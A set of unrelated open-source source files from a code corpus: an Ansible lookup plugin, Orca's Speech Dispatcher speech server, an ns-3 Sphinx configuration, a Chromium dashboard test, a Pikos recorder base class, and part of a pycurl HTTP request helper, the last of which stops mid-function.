# can use a dict instead of list item to pass inline config
for term in terms:
if isinstance(term, Mapping):
self.set_options(var_options=variables, direct=term)
elif isinstance(term, string_types):
self.set_options(var_options=variables, direct=kwargs)
elif isinstance(term, Sequence):
partial, skip = self._process_terms(term, variables, kwargs)
total_search.extend(partial)
continue
else:
raise AnsibleLookupError("Invalid term supplied, can handle string, mapping or list of strings but got: %s for %s" % (type(term), term))
files = self.get_option('files')
paths = self.get_option('paths')
# NOTE: this is used as 'global' but can be set many times?!?!?
skip = self.get_option('skip')
# magic extra spliting to create lists
filelist = _split_on(files, ',;')
pathlist = _split_on(paths, ',:;')
# create search structure
if pathlist:
for path in pathlist:
for fn in filelist:
f = os.path.join(path, fn)
total_search.append(f)
elif filelist:
# NOTE: this seems wrong, should be 'extend' as any option/entry can clobber all
total_search = filelist
else:
total_search.append(term)
return total_search, skip
def run(self, terms, variables, **kwargs):
total_search, skip = self._process_terms(terms, variables, kwargs)
# NOTE: during refactor noticed that the 'using a dict' as term
# is designed to only work with 'one' otherwise inconsistencies will appear.
# see other notes below.
# actually search
subdir = getattr(self, '_subdir', 'files')
path = None
for fn in total_search:
try:
fn = self._templar.template(fn)
except (AnsibleUndefinedVariable, UndefinedError):
continue
# get subdir if set by task executor, default to files otherwise
path = self.find_file_in_search_path(variables, subdir, fn, ignore_missing=True)
# exit if we find one!
if path is not None:
return [path]
# if we get here, no file was found
if skip:
# NOTE: global skip wont matter, only last 'skip' value in dict term
return []
raise AnsibleLookupError("No file was found when using first_found. Use errors='ignore' to allow this task to be skipped if no files are found")
| gpl-3.0 | -7,768,599,136,003,885,000 | 33.014354 | 152 | 0.608524 | false |
chrys87/orca-beep | src/orca/speechdispatcherfactory.py | 1 | 20607 | # Copyright 2006, 2007, 2008, 2009 Brailcom, o.p.s.
#
# Author: Tomas Cerha <[email protected]>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
# # [[[TODO: richb - Pylint is giving us a bunch of warnings along these
# lines throughout this file:
#
# W0142:202:SpeechServer._send_command: Used * or ** magic
#
# So for now, we just disable these warnings in this module.]]]
#
# pylint: disable-msg=W0142
"""Provides an Orca speech server for Speech Dispatcher backend."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__author__ = "Tomas Cerha <[email protected]>"
__copyright__ = "Copyright (c) 2006-2008 Brailcom, o.p.s."
__license__ = "LGPL"
from gi.repository import GLib
import re
import time
from . import chnames
from . import debug
from . import guilabels
from . import messages
from . import speechserver
from . import settings
from . import orca_state
from . import punctuation_settings
from .acss import ACSS
try:
import speechd
except:
_speechd_available = False
else:
_speechd_available = True
try:
getattr(speechd, "CallbackType")
except AttributeError:
_speechd_version_ok = False
else:
_speechd_version_ok = True
PUNCTUATION = re.compile('[^\w\s]', re.UNICODE)
ELLIPSIS = re.compile('(\342\200\246|(?<!\.)\.{3,4}(?=(\s|\Z)))')
class SpeechServer(speechserver.SpeechServer):
# See the parent class for documentation.
_active_servers = {}
DEFAULT_SERVER_ID = 'default'
_SERVER_NAMES = {DEFAULT_SERVER_ID: guilabels.DEFAULT_SYNTHESIZER}
def getFactoryName():
return guilabels.SPEECH_DISPATCHER
getFactoryName = staticmethod(getFactoryName)
def getSpeechServers():
servers = []
default = SpeechServer._getSpeechServer(SpeechServer.DEFAULT_SERVER_ID)
if default is not None:
servers.append(default)
for module in default.list_output_modules():
servers.append(SpeechServer._getSpeechServer(module))
return servers
getSpeechServers = staticmethod(getSpeechServers)
def _getSpeechServer(cls, serverId):
"""Return an active server for given id.
Attempt to create the server if it doesn't exist yet. Returns None
when it is not possible to create the server.
"""
if serverId not in cls._active_servers:
cls(serverId)
# Don't return the instance, unless it is succesfully added
# to `_active_Servers'.
return cls._active_servers.get(serverId)
_getSpeechServer = classmethod(_getSpeechServer)
def getSpeechServer(info=None):
if info is not None:
thisId = info[1]
else:
thisId = SpeechServer.DEFAULT_SERVER_ID
return SpeechServer._getSpeechServer(thisId)
getSpeechServer = staticmethod(getSpeechServer)
def shutdownActiveServers():
for server in list(SpeechServer._active_servers.values()):
server.shutdown()
shutdownActiveServers = staticmethod(shutdownActiveServers)
# *** Instance methods ***
def __init__(self, serverId):
super(SpeechServer, self).__init__()
self._id = serverId
self._client = None
self._current_voice_properties = {}
self._acss_manipulators = (
(ACSS.RATE, self._set_rate),
(ACSS.AVERAGE_PITCH, self._set_pitch),
(ACSS.GAIN, self._set_volume),
(ACSS.FAMILY, self._set_family),
)
if not _speechd_available:
msg = 'ERROR: Speech Dispatcher is not available'
debug.println(debug.LEVEL_WARNING, msg, True)
return
if not _speechd_version_ok:
msg = 'ERROR: Speech Dispatcher version 0.6.2 or later is required.'
debug.println(debug.LEVEL_WARNING, msg, True)
return
# The following constants must be initialized in runtime since they
# depend on the speechd module being available.
self._PUNCTUATION_MODE_MAP = {
settings.PUNCTUATION_STYLE_ALL: speechd.PunctuationMode.ALL,
settings.PUNCTUATION_STYLE_MOST: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_SOME: speechd.PunctuationMode.SOME,
settings.PUNCTUATION_STYLE_NONE: speechd.PunctuationMode.NONE,
}
self._CALLBACK_TYPE_MAP = {
speechd.CallbackType.BEGIN: speechserver.SayAllContext.PROGRESS,
speechd.CallbackType.CANCEL: speechserver.SayAllContext.INTERRUPTED,
speechd.CallbackType.END: speechserver.SayAllContext.COMPLETED,
#speechd.CallbackType.INDEX_MARK:speechserver.SayAllContext.PROGRESS,
}
self._default_voice_name = guilabels.SPEECH_DEFAULT_VOICE % serverId
try:
self._init()
except:
debug.printException(debug.LEVEL_WARNING)
msg = 'ERROR: Speech Dispatcher service failed to connect'
debug.println(debug.LEVEL_WARNING, msg, True)
else:
SpeechServer._active_servers[serverId] = self
self._lastKeyEchoTime = None
def _init(self):
self._client = client = speechd.SSIPClient('Orca', component=self._id)
client.set_priority(speechd.Priority.MESSAGE)
if self._id != self.DEFAULT_SERVER_ID:
client.set_output_module(self._id)
self._current_voice_properties = {}
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
client.set_punctuation(mode)
def updateCapitalizationStyle(self):
"""Updates the capitalization style used by the speech server."""
if settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_ICON:
style = 'icon'
elif settings.capitalizationStyle == settings.CAPITALIZATION_STYLE_SPELL:
style = 'spell'
else:
style = 'none'
self._client.set_cap_let_recogn(style)
def updatePunctuationLevel(self):
""" Punctuation level changed, inform this speechServer. """
mode = self._PUNCTUATION_MODE_MAP[settings.verbalizePunctuationStyle]
self._client.set_punctuation(mode)
def _send_command(self, command, *args, **kwargs):
if hasattr(speechd, 'SSIPCommunicationError'):
try:
return command(*args, **kwargs)
except speechd.SSIPCommunicationError:
msg = "SPEECH DISPATCHER: Connection lost. Trying to reconnect."
debug.println(debug.LEVEL_INFO, msg, True)
self.reset()
return command(*args, **kwargs)
except:
pass
else:
# It is not possible tho catch the error with older SD versions.
return command(*args, **kwargs)
def _set_rate(self, acss_rate):
rate = int(2 * max(0, min(99, acss_rate)) - 98)
self._send_command(self._client.set_rate, rate)
def _set_pitch(self, acss_pitch):
pitch = int(20 * max(0, min(9, acss_pitch)) - 90)
self._send_command(self._client.set_pitch, pitch)
def _set_volume(self, acss_volume):
volume = int(15 * max(0, min(9, acss_volume)) - 35)
self._send_command(self._client.set_volume, volume)
def _set_family(self, acss_family):
familyLocale = acss_family.get(speechserver.VoiceFamily.LOCALE)
if not familyLocale:
import locale
familyLocale, encoding = locale.getdefaultlocale()
if familyLocale:
lang = familyLocale.split('_')[0]
if lang and len(lang) == 2:
self._send_command(self._client.set_language, str(lang))
try:
# This command is not available with older SD versions.
set_synthesis_voice = self._client.set_synthesis_voice
except AttributeError:
pass
else:
name = acss_family.get(speechserver.VoiceFamily.NAME)
if name != self._default_voice_name:
self._send_command(set_synthesis_voice, name)
def _debug_sd_values(self, prefix=""):
if debug.debugLevel > debug.LEVEL_INFO:
return
try:
sd_rate = self._send_command(self._client.get_rate)
sd_pitch = self._send_command(self._client.get_pitch)
except:
sd_rate = "(exception occurred)"
sd_pitch = "(exception occurred)"
current = self._current_voice_properties
msg = "SPEECH DISPATCHER: %sOrca rate %s, pitch %s; " \
"SD rate %s, pitch %s" % \
(prefix,
self._current_voice_properties.get(ACSS.RATE),
self._current_voice_properties.get(ACSS.AVERAGE_PITCH),
sd_rate,
sd_pitch)
debug.println(debug.LEVEL_INFO, msg, True)
def _apply_acss(self, acss):
if acss is None:
acss = settings.voices[settings.DEFAULT_VOICE]
current = self._current_voice_properties
for acss_property, method in self._acss_manipulators:
value = acss.get(acss_property)
if value is not None:
if current.get(acss_property) != value:
method(value)
current[acss_property] = value
elif acss_property == ACSS.AVERAGE_PITCH:
method(5.0)
current[acss_property] = 5.0
elif acss_property == ACSS.FAMILY \
and acss == settings.voices[settings.DEFAULT_VOICE]:
# We need to explicitly reset (at least) the family.
# See bgo#626072.
#
method({})
current[acss_property] = {}
def __addVerbalizedPunctuation(self, oldText):
"""Depending upon the users verbalized punctuation setting,
adjust punctuation symbols in the given text to their pronounced
equivalents. The pronounced text will either replace the
punctuation symbol or be inserted before it. In the latter case,
this is to retain spoken prosity.
Arguments:
- oldText: text to be parsed for punctuation.
Returns a text string with the punctuation symbols adjusted accordingly.
"""
spokenEllipsis = messages.SPOKEN_ELLIPSIS + " "
newText = re.sub(ELLIPSIS, spokenEllipsis, oldText)
symbols = set(re.findall(PUNCTUATION, newText))
for symbol in symbols:
try:
level, action = punctuation_settings.getPunctuationInfo(symbol)
except:
continue
if level != punctuation_settings.LEVEL_NONE:
# Speech Dispatcher should handle it.
#
continue
charName = " %s " % chnames.getCharacterName(symbol)
if action == punctuation_settings.PUNCTUATION_INSERT:
charName += symbol
newText = re.sub(symbol, charName, newText)
if orca_state.activeScript:
newText = orca_state.activeScript.utilities.adjustForDigits(newText)
return newText
def _speak(self, text, acss, **kwargs):
if isinstance(text, ACSS):
text = ''
text = self.__addVerbalizedPunctuation(text)
if orca_state.activeScript:
text = orca_state.activeScript.\
utilities.adjustForPronunciation(text)
# Replace no break space characters with plain spaces since some
# synthesizers cannot handle them. See bug #591734.
#
text = text.replace('\u00a0', ' ')
# Replace newline followed by full stop, since
# this seems to crash sd, see bgo#618334.
#
text = text.replace('\n.', '\n')
self._apply_acss(acss)
self._debug_sd_values("Speaking '%s' " % text)
self._send_command(self._client.speak, text, **kwargs)
def _say_all(self, iterator, orca_callback):
"""Process another sayAll chunk.
Called by the gidle thread.
"""
try:
context, acss = next(iterator)
except StopIteration:
pass
else:
def callback(callbackType, index_mark=None):
# This callback is called in Speech Dispatcher listener thread.
# No subsequent Speech Dispatcher interaction is allowed here,
# so we pass the calls to the gidle thread.
t = self._CALLBACK_TYPE_MAP[callbackType]
if t == speechserver.SayAllContext.PROGRESS:
if index_mark:
context.currentOffset = int(index_mark)
else:
context.currentOffset = context.startOffset
elif t == speechserver.SayAllContext.COMPLETED:
context.currentOffset = context.endOffset
GLib.idle_add(orca_callback, context, t)
if t == speechserver.SayAllContext.COMPLETED:
GLib.idle_add(self._say_all, iterator, orca_callback)
self._speak(context.utterance, acss, callback=callback,
event_types=list(self._CALLBACK_TYPE_MAP.keys()))
return False # to indicate, that we don't want to be called again.
def _cancel(self):
self._send_command(self._client.cancel)
def _change_default_speech_rate(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
rate = acss[ACSS.RATE]
except KeyError:
rate = 50
acss[ACSS.RATE] = max(0, min(99, rate + delta))
msg = 'SPEECH DISPATCHER: Rate set to %d' % rate
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SLOWER \
or messages.SPEECH_FASTER, acss=acss)
def _change_default_speech_pitch(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
pitch = acss[ACSS.AVERAGE_PITCH]
except KeyError:
pitch = 5
acss[ACSS.AVERAGE_PITCH] = max(0, min(9, pitch + delta))
msg = 'SPEECH DISPATCHER: Pitch set to %d' % pitch
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_LOWER \
or messages.SPEECH_HIGHER, acss=acss)
def _change_default_speech_volume(self, step, decrease=False):
acss = settings.voices[settings.DEFAULT_VOICE]
delta = step * (decrease and -1 or +1)
try:
volume = acss[ACSS.GAIN]
except KeyError:
volume = 5
acss[ACSS.GAIN] = max(0, min(9, volume + delta))
msg = 'SPEECH DISPATCHER: Volume set to %d' % volume
debug.println(debug.LEVEL_INFO, msg, True)
self.speak(decrease and messages.SPEECH_SOFTER \
or messages.SPEECH_LOUDER, acss=acss)
def getInfo(self):
return [self._SERVER_NAMES.get(self._id, self._id), self._id]
def getVoiceFamilies(self):
# Always offer the configured default voice with a language
# set according to the current locale.
from locale import getlocale, LC_MESSAGES
locale = getlocale(LC_MESSAGES)[0]
if locale is None or locale == 'C':
lang = None
dialect = None
else:
lang, dialect = locale.split('_')
voices = ((self._default_voice_name, lang, None),)
try:
# This command is not available with older SD versions.
list_synthesis_voices = self._client.list_synthesis_voices
except AttributeError:
pass
else:
try:
voices += self._send_command(list_synthesis_voices)
except:
pass
families = [speechserver.VoiceFamily({ \
speechserver.VoiceFamily.NAME: name,
#speechserver.VoiceFamily.GENDER: speechserver.VoiceFamily.MALE,
speechserver.VoiceFamily.DIALECT: dialect,
speechserver.VoiceFamily.LOCALE: lang})
for name, lang, dialect in voices]
return families
def speak(self, text=None, acss=None, interrupt=True):
#if interrupt:
# self._cancel()
# "We will not interrupt a key echo in progress." (Said the comment in
# speech.py where these next two lines used to live. But the code here
# suggests we haven't been doing anything with the lastKeyEchoTime in
# years. TODO - JD: Dig into this and if it's truly useless, kill it.)
if self._lastKeyEchoTime:
interrupt = interrupt and (time.time() - self._lastKeyEchoTime) > 0.5
if text:
self._speak(text, acss)
def speakUtterances(self, utteranceList, acss=None, interrupt=True):
#if interrupt:
# self._cancel()
for utterance in utteranceList:
if utterance:
self._speak(utterance, acss)
def sayAll(self, utteranceIterator, progressCallback):
GLib.idle_add(self._say_all, utteranceIterator, progressCallback)
def speakCharacter(self, character, acss=None):
self._apply_acss(acss)
if character == '\n':
self._send_command(self._client.sound_icon, 'end-of-line')
return
name = chnames.getCharacterName(character)
if not name:
self._send_command(self._client.char, character)
return
if orca_state.activeScript:
name = orca_state.activeScript.\
utilities.adjustForPronunciation(name)
self.speak(name, acss)
def speakKeyEvent(self, event):
if event.isPrintableKey() and event.event_string.isupper():
acss = settings.voices[settings.UPPERCASE_VOICE]
else:
acss = ACSS(settings.voices[settings.DEFAULT_VOICE])
event_string = event.getKeyName()
if orca_state.activeScript:
event_string = orca_state.activeScript.\
utilities.adjustForPronunciation(event_string)
lockingStateString = event.getLockingStateString()
event_string = "%s %s" % (event_string, lockingStateString)
self.speak(event_string, acss=acss)
self._lastKeyEchoTime = time.time()
def increaseSpeechRate(self, step=5):
self._change_default_speech_rate(step)
def decreaseSpeechRate(self, step=5):
self._change_default_speech_rate(step, decrease=True)
def increaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step)
def decreaseSpeechPitch(self, step=0.5):
self._change_default_speech_pitch(step, decrease=True)
def increaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step)
def decreaseSpeechVolume(self, step=0.5):
self._change_default_speech_volume(step, decrease=True)
def stop(self):
self._cancel()
def shutdown(self):
self._client.close()
del SpeechServer._active_servers[self._id]
def reset(self, text=None, acss=None):
self._client.close()
self._init()
def list_output_modules(self):
"""Return names of available output modules as a tuple of strings.
This method is not a part of Orca speech API, but is used internally
by the Speech Dispatcher backend.
The returned tuple can be empty if the information can not be
obtained (e.g. with an older Speech Dispatcher version).
"""
try:
return self._send_command(self._client.list_output_modules)
except AttributeError:
return ()
except speechd.SSIPCommandError:
return ()
| lgpl-2.1 | 5,530,888,183,352,487,000 | 36.950276 | 81 | 0.609841 | false |
teto/ns-3-dev-git | doc/tutorial/source/conf.py | 1 | 7057 | # -*- coding: utf-8 -*-
#
# ns-3 documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 14 09:00:39 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.imgmath']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'ns-3'
copyright = u'2010, ns-3 project'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'ns-3-dev'
# The full version, including alpha/beta/rc tags.
release = 'ns-3-dev'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'ns3_html_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = ['../..']
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = 'Tutorial'
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y %H:%M'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'ns-3doc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'ns-3-tutorial.tex', u'ns-3 Tutorial',
u'ns-3 project', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
latex_logo = '../../ns3_html_theme/static/ns-3.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
latex_preamble = '\usepackage{amssymb}'
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ns-3-tutorial', u'ns-3 Tutorial',
[u'ns-3 project'], 1)
]
| gpl-2.0 | -883,867,585,173,012,000 | 31.671296 | 80 | 0.705399 | false |
benschmaus/catapult | dashboard/dashboard/benchmark_health_report_test.py | 2 | 5261 | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import unittest
import webapp2
import webtest
from google.appengine.ext import ndb
from dashboard import benchmark_health_report
from dashboard import update_test_suites
from dashboard.common import stored_object
from dashboard.common import testing_common
from dashboard.common import utils
from dashboard.models import anomaly
from dashboard.models import graph_data
class BenchmarkHealthReportTest(testing_common.TestCase):
def setUp(self):
super(BenchmarkHealthReportTest, self).setUp()
app = webapp2.WSGIApplication(
[('/benchmark_health_report',
benchmark_health_report.BenchmarkHealthReportHandler)])
self.testapp = webtest.TestApp(app)
def _AddAnomalyEntities(
self, revision_ranges, test_key, bug_id=None):
"""Adds a group of Anomaly entities to the datastore."""
urlsafe_keys = []
for start_rev, end_rev in revision_ranges:
anomaly_key = anomaly.Anomaly(
start_revision=start_rev, end_revision=end_rev,
test=test_key, bug_id=bug_id,
median_before_anomaly=100, median_after_anomaly=200).put()
urlsafe_keys.append(anomaly_key.urlsafe())
return urlsafe_keys
def _AddTests(self):
"""Adds sample TestMetadata entities and returns their keys."""
testing_common.AddTests(['ChromiumPerf'], ['linux'], {
'sunspider': {
'Total': {},
'ref': {},
},
'page_cycler': {
'load_time': {
'cnn.com': {},
'google.com': {},
}
}
})
tests = graph_data.TestMetadata.query()
for test in tests:
test.improvement_direction = anomaly.DOWN
ndb.put_multi(tests)
def _AddCachedSuites(self):
test_suites = {
'sunspider': {
'mas': {'ChromiumPerf': {'mac': False, 'linux': False}},
'mon': [],
},
'page_cycler': {
'mas': {'ChromiumPerf': {'linux': False}, 'CrOS': {'foo': False}},
'mon': ['load_time'],
},
'speedometer': {
'mas': {'CrOS': {'foo': False, 'bar': False}},
'mon': [],
}
}
key = update_test_suites._NamespaceKey(
update_test_suites._LIST_SUITES_CACHE_KEY)
stored_object.Set(key, test_suites)
def testGet(self):
response = self.testapp.get('/benchmark_health_report')
self.assertEqual('text/html', response.content_type)
self.assertIn('Chrome Performance Dashboard', response.body)
def testPost_MasterArgument_ListsTestsForMaster(self):
self._AddCachedSuites()
response = self.testapp.post(
'/benchmark_health_report', {'master': 'CrOS'})
benchmark_list = self.GetJsonValue(response, 'benchmarks')
self.assertItemsEqual(benchmark_list, [{
'name': 'page_cycler',
'monitored': True,
'bots': ['foo'],
}, {
'name': 'speedometer',
'monitored': False,
'bots': ['bar', 'foo'],
}])
def testPost_BenchmarkArgument_ListsAlertsAndBots(self):
self._AddCachedSuites()
self._AddTests()
self._AddAnomalyEntities(
[(200, 400), (600, 800)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time'))
self._AddAnomalyEntities(
[(500, 700)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time/cnn.com'))
response = self.testapp.post(
'/benchmark_health_report', {
'benchmark': 'page_cycler',
'num_days': '30',
'master': 'ChromiumPerf',
})
bots = self.GetJsonValue(response, 'bots')
self.assertItemsEqual(bots, ['linux'])
self.assertTrue(self.GetJsonValue(response, 'monitored'))
alerts = self.GetJsonValue(response, 'alerts')
self.assertEqual(3, len(alerts))
def testPost_Benchmark_NotMonitored(self):
self._AddCachedSuites()
self._AddTests()
response = self.testapp.post(
'/benchmark_health_report', {
'benchmark': 'sunspider',
'num_days': '30',
'master': 'ChromiumPerf',
})
self.assertFalse(self.GetJsonValue(response, 'monitored'))
def testPost_BenchmarkArgumentNumDaysArgument_ListsCorrectAlerts(self):
self._AddCachedSuites()
self._AddTests()
self._AddAnomalyEntities(
[(200, 400), (600, 800)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time'))
self._AddAnomalyEntities(
[(500, 700)],
utils.TestKey('ChromiumPerf/linux/page_cycler/load_time/cnn.com'))
anomalies = anomaly.Anomaly.query().fetch()
anomalies[0].timestamp = datetime.datetime.now() - datetime.timedelta(
days=20)
anomalies[0].put()
response = self.testapp.post(
'/benchmark_health_report',
{'benchmark': 'page_cycler', 'num_days': '5', 'master': 'ChromiumPerf'})
bots = self.GetJsonValue(response, 'bots')
self.assertItemsEqual(bots, ['linux'])
self.assertTrue(self.GetJsonValue(response, 'monitored'))
alerts = self.GetJsonValue(response, 'alerts')
self.assertEqual(2, len(alerts))
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | 4,280,909,695,348,275,000 | 32.509554 | 80 | 0.624976 | false |
enthought/pikos | pikos/recorders/abstract_recorder.py | 1 | 1322 | # -*- coding: utf-8 -*-
#------------------------------------------------------------------------------
# Package: Pikos toolkit
# File: recorders/abstract_recorder.py
# License: LICENSE.TXT
#
# Copyright (c) 2012, Enthought, Inc.
# All rights reserved.
#------------------------------------------------------------------------------
import abc
class RecorderError(Exception):
pass
class AbstractRecorder(object):
""" Abstract recorder class.
A recorder is reposnible for storing the record data that are provided by
the monitor or profiler. The records are expected to be nametuple-like
classes.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def prepare(self, record):
""" Perform any setup required before the recorder is used.
Parameters
----------
record : NamedTuple
The record class that is going to be used.
"""
@abc.abstractmethod
def finalize(self):
""" Perform any tasks to finalize and clean up when the recording
has completed.
"""
@abc.abstractmethod
def record(self, data):
""" Record a measurement.
Parameters
----------
data : NamedTuple
An instance of the record class that is going to be used.
"""
| bsd-3-clause | -9,214,632,131,664,054,000 | 23.036364 | 79 | 0.537821 | false |
mpetyx/pychatbot | SemanticWebApproach/RoboWriter/allegrordf-1.0.1/franz/miniclient/request.py | 1 | 6234 | import StringIO, pycurl, urllib, cjson, locale
from threading import Lock
class Pool:
def __init__(self, create):
self.create = create
self.lock = Lock()
self.pool = []
def get(self):
self.lock.acquire()
try:
if len(self.pool): return self.pool.pop()
else: return self.create()
finally:
self.lock.release()
def put(self, value):
self.lock.acquire()
try:
self.pool.append(value)
finally:
self.lock.release()
curlPool = Pool(pycurl.Curl)
class RequestError(Exception):
def __init__(self, status, message):
print status, message
self.status = status
self.message = message
def __str__(self):
return "Server returned %s: %s" % (self.status, self.message)
def urlenc(**args):
buf = []
def enc(name, val):
buf.append(urllib.quote(name) + "=" + urllib.quote(val))
def encval(name, val):
if val is None: pass
elif isinstance(val, bool): enc(name, (val and "true") or "false")
elif isinstance(val, int): enc(name, "%d" % val)
elif isinstance(val, float): enc(name, "%g" % val)
elif isinstance(val, list) or isinstance(val, tuple):
for elt in val: encval(name, elt)
elif isinstance(val, basestring):
enc(name, val.encode("utf-8"))
else:
enc(name, unicode(val).encode("utf-8"))
for name, val in args.iteritems():
encval(name, val)
return "&".join(buf)
def makeRequest(obj, method, url, body=None, accept="*/*", contentType=None, callback=None, errCallback=None):
curl = curlPool.get()
if obj:
if obj.user and obj.password:
curl.setopt(pycurl.USERPWD, "%s:%s" % (obj.user, obj.password))
curl.setopt(pycurl.HTTPAUTH, pycurl.HTTPAUTH_BASIC)
if url.startswith("/"): url = obj.url + url
postbody = method == "POST" or method == "PUT"
curl.setopt(pycurl.POSTFIELDS, "")
if body:
if postbody:
curl.setopt(pycurl.POSTFIELDS, body)
else:
url = url + "?" + body
curl.setopt(pycurl.POST, (postbody and 1) or 0)
curl.setopt(pycurl.CUSTOMREQUEST, method)
curl.setopt(pycurl.URL, url)
# The "Expect:" is there to suppress "Expect: 100-continue"
# behaviour that is the default in libcurl when posting large
# bodies.
headers = ["Connection: keep-alive", "Accept: " + accept, "Expect:"]
if contentType and postbody: headers.append("Content-Type: " + contentType)
if callback: headers.append("Connection: close")
curl.setopt(pycurl.HTTPHEADER, headers)
curl.setopt(pycurl.ENCODING, "") # which means 'any encoding that curl supports'
if callback:
status = [None]
error = []
def headerfunc(string):
if status[0] is None:
status[0] = locale.atoi(string.split(" ")[1])
return len(string)
def writefunc(string):
if status[0] == 200: callback(string)
else: error.append(string.decode("utf-8"))
curl.setopt(pycurl.WRITEFUNCTION, writefunc)
curl.setopt(pycurl.HEADERFUNCTION, headerfunc)
curl.perform()
if status[0] != 200:
errCallback(curl.getinfo(pycurl.RESPONSE_CODE), "".join(error))
else:
buf = StringIO.StringIO()
